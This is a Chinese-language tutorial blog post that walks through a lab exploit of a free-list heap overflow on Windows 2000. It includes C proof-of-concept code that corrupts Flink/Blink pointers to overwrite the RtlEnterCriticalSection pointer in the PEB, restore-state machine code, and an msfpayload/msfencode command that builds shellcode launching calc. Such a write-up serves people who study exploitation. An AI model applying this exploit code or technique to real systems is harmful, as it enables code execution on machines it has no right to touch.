文章目录
  1. 1. 0x000 环境
  2. 2. 0x001堆溢出之空表
  3. 3. 0x002 DWROD SHOOT代码植入
  4. 4. 0x003 总结
  5. 5. 0x004 参考书籍

本系列文章讲述了windows 2000 下 堆溢出的方法


0x000 环境

  1. 虚拟机 VirtualBox 5.0.20
  2. 系统 windows 2000 Kali linux
  3. 工具 VC++6.0 OllyDbg 1.10 汉化版 AsmToE v5.20

0x001堆溢出之空表

  1. 代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    2. #include <stdio.h>
    3. #include <windows.h>
    4.
    5. int main()
    6. {
    7. HANDLE hp;
    8. HLOCAL h1,h2,h3;
    9. char * buf;
    10.
    11.
    12. hp = HeapCreate(0,0x1000,0x10000);
    13.
    14. __asm int 3
    15.
    16. buf = (char *)HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
    17. h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
    18. h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
    19.
    20. HeapFree(hp,0,h1);
    21.
    22. strcpy(buf,"AAAAAAAABBBBBBBBCCCCDDDD");
    23. //buf大小为8,而字符串的长度是('A'*8+'B'*8+'C'*4+'D'*4)24
    24. //,这里会产生溢出
    25. //其中'A'覆盖buf申请的空间,而'B'会覆盖下一个堆块的头(这里)
    26. h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); //DWORD SHOOT
    27. return 0;
    28. }
  2. 空表溢出原理及现象分析
    a) 编译程序,运行等等我在这里就不一一赘述了,上篇文章已经写的很明白了,溢这里主要就是讲堆出的原理和利用的方式。
    b) 首先运行上面的程序,程序崩溃,进入OD调试,这和上篇文章的操作一样,断点的位置都是一样的,转到堆上。

    c) 单步调试,直到堆块分配完毕,一共分配三块堆块(这是有原因的,首先堆是初始化的状态,所有分配的堆块都是从“尾块”分配,分配的地址是连续的,这对后期的堆溢出有很大帮助),从下图可以验证上述所说的内容,其中上面的就是三块新分配的堆块,下面的是尾块。

    d) 继续单步调试结合源代码可以看出来,将第二块的堆块释放了,他被链接到了空表free2的上了,而这块堆块正是要被溢出的堆块,(同时这里解释一下第三个堆块的作用,防止发生堆块合并,如果没有第三块,那么在第二块的释放后,第二块会和后面的堆块发生合并,变成新的“尾块”,这里虽然不会影响堆溢出,但是现象不如现在的结果明显),具体现象如下图,其中选中部分是第二堆块,红色框分别为Flink和Blink指针。

    e) 结合源代码可以看出来之后调用了strcpy函数,从分配的堆块大小可以看出发生了溢出,同时我也在旁边的位置标注了注释,可以很清楚的看出,溢出的位置和对应位置的数据,单步直到复制完毕,可以看到下图的变化,选中的部分是复制的数据,对比上面的图,可以看出来43(’C’)的位置就是Flink,而44(‘D’)就是Blink。

    f) 下面直接运行程序,程序会断在下面的位置,我在这些位置做了注释,大家可以对照着看,分析一下堆块卸载的过程,可以分析出来,在堆块卸载的过程会将节点Flink的值写入Blink所指向的地址。

  3. 总结
    通过对上面的小程序的调试和分析,我们从源代码和汇编的角度清楚的明白了空表溢出的原理及现象,并且可以知道空表堆溢出会造成一次任意地址写。

    0x002 DWROD SHOOT代码植入

  4. 修改代码
    将上面的代码修改成下面这样,大家可以结合注释来看,这个程序运行之后,附加调试器,最后会断在和上面程序一样的地址,就是要将43434343 写入地址44444444,这里的地址是不访问的所以断了下来,我们可以将44444444换成程序可以写入的地址,再将43434343设置成要写入的数据(比如shellcode的地址等),就可以完成DWORD SHOOT。(其中\x90 对应的指令是nop,跳到shellcode 中就可以滑行了)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
1. #include <stdio.h>
2. #include <windows.h>
3.
4. char shellcode[]=
5. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" //每行15个字节 一共304个\x90用来填充新申请的堆块,这里有个对齐
6. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
7. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
8. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
9. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
10. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
11. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
12. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
13. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
14. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
15. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
16. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
17. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
18. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
19. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
20. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
21. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
22. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
23. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
24. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
25. "\x90\x90\x90\x90"
26. "\x41\x41\x41\x41\x41\x41\x41\x41" // 下一个堆块的头
27. "\x43\x43\x43\x43" //Flink
28. "\x44\x44\x44\x44" //Blink
29. ;
30.
31. int main()
32. {
33. HANDLE hp;
34. HLOCAL h1,h2,h3;
35. char * buf;
36.
37.
38. hp = HeapCreate(0,0x1000,0x10000);
39.
40. __asm int 3
41.
42. buf = (char *)HeapAlloc(hp,HEAP_ZERO_MEMORY,300);
43. h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
44. h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
45.
46. HeapFree(hp,0,h1);
47.
48. memcpy(buf,shellcode,0x200); //溢出点
49.
50. h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); //DWORD SHOOT
51.
52. return 0;
53. }
  1. 寻找DWORD SHOOT 地址
    a) 确定DWORD SHOOT目标
    《0day安全》中也说了很多的目标,我这里就选用这个函数RtlEnterCriticalSection(进入临界区的函数)为目标。
    b) 通过OD确定RtlEnterCriticalSection地址
    这里首先要了解一些知识(PEB和TEB)
    PEB:进程环境块
    TEB:线程环境块
    (这里我也只说一些相关的知识,如果想深入理解个两个结构,可以上网搜索一些相关资料)
    1) 首先和上面一样运行程序,调试,附加OD后会断下来,在寄存器窗口,可以看到FS寄存器它存储的就是TEB的地址

    2) 它在PEB偏移为0x20的位置,而PEB在TEB结构中偏移0x30的位置,我们来查看一下(在OD下面的command中输入 dd 7ffde000数据窗口就会显示对应的数据),如下图偏移0x30的值是0x7ffdf000

    3) 同上查看PEB(在command中输入dd 7ffdf000 )的结果如下图,红框的地方就是RtlEnterCriticalSection的地址,它在PEB偏移0x20的位置

    c) 总结
    至此,我们通过OD调试器找到了目标(RtlEnterCriticalSection)地址7ffdf020(当然在每个机子上地址将会不同,请大家自己动手调试),这里也记录一下 这个地址上的数据,在后面的时候会用到。
  2. 查找shellcode的地址
    因为最后shellcode 要复制到申请的第一个堆块中,所以找到第一个堆块的起始地址就行了,在我的电脑中的地址是0x00360688
  3. 再次修改代码
    将刚才得到的shellcode地址放到Flink的位置,将存放RtlEnterCriticalSection函数的地址放到Blink的位置,在将shellcode从开始第八个字节之后的任意一个字节改成”\xcc”(至于为什么是8个字节之后,一会我在后面解释),这样相当于int 3 断点,这样可以使程序断下来,便于我们观察,具体修改结果如下图。
  4. 验证DWORD SHOOT
    重新编译后再次调试程序,我这里直接F9运行,结果断了下来,在查看存放RtlEnterCriticalSection函数的地址0x7ffdf020,可以看到这个地址现在存放的就是0x00360688,就是之前Flink的值,而程序也跳的shellcode去执行了,这些都证明了DWORD SHOOT成功了,具体结果如下图。
  5. 完善生成并替换shellcode
  6. 恢复现场
    我们修改了RtlEnterCriticalSection函数的地址,这很可能影响到系统的其他程序,所以在我们运行shellcode之前应该,将之前的数据恢复,之前我们也记录了正确的RtlEnterCriticalSection函数地址我们将它恢复回去。
    我们可以使用下面三条的汇编指令实现
    mov eax,77F89103h
    mov ebx,7FFDF020h
    mov dword ptr ds:[ebx],eax
    使用AsmToE工具将汇编转换成机器码如下,
    \xB8\x03\x91\xF8\x77\xBB\x20\xF0\xFD\x7F\x89\x03
  7. 生成shellcode
    我这里使用Kali 系统的msfpayload生成了一个shellcode,命令如下:
    msfpayload windows/exec CMD=”cmd /k calc” R|msfencode -e x86/shikata_ga_nai -b “\x00” -t c
  8. 替换shellcode
    终极shellcode如下图:
  9. 注释掉断点运行结果如下图,可以看出来shellcode运行成功了,我们的攻击也成功了。

  10. 指针反射
    这里讲一下之前为什么要求shellcode从第八个字节之后,在正式开始,我们可以先看一下DWORD SHOOT 之后第一个堆块里的变化,可以看到第四个字节之后写入了新的数据并不是之前的90,这是因为DOWRD SHOOT 发生在链表卸载的第一句上,第二句会继续执行,将Blink的值写入shellcode起始位置偏移加4的位置,好在大多是情况下不会影响shellcode的正常运行。

  11. 对”指针反射”的解决
    这里也提出一个办法绕过可以使用下面的指令短跳转过这四个字节,他们的机器码为EB+偏移,shellcode修改如下图即可。

    0x003 总结

    经过这次实验,对上一节的堆结构更加深入的理解,同时对空表DWORD SHOOT 的利用有了更深入的了解,以后一定要多动手多练习,这样才能加深对知识的理解和利用,下一节我会动手多一下块表的DWORD SHOOT 的原理和利用。

    0x004 参考书籍

    [1]:《0day安全 软件漏洞分析技术 (第二版)》王清
文章目录
  1. 1. 0x000 环境
  2. 2. 0x001堆溢出之空表
  3. 3. 0x002 DWROD SHOOT代码植入
  4. 4. 0x003 总结
  5. 5. 0x004 参考书籍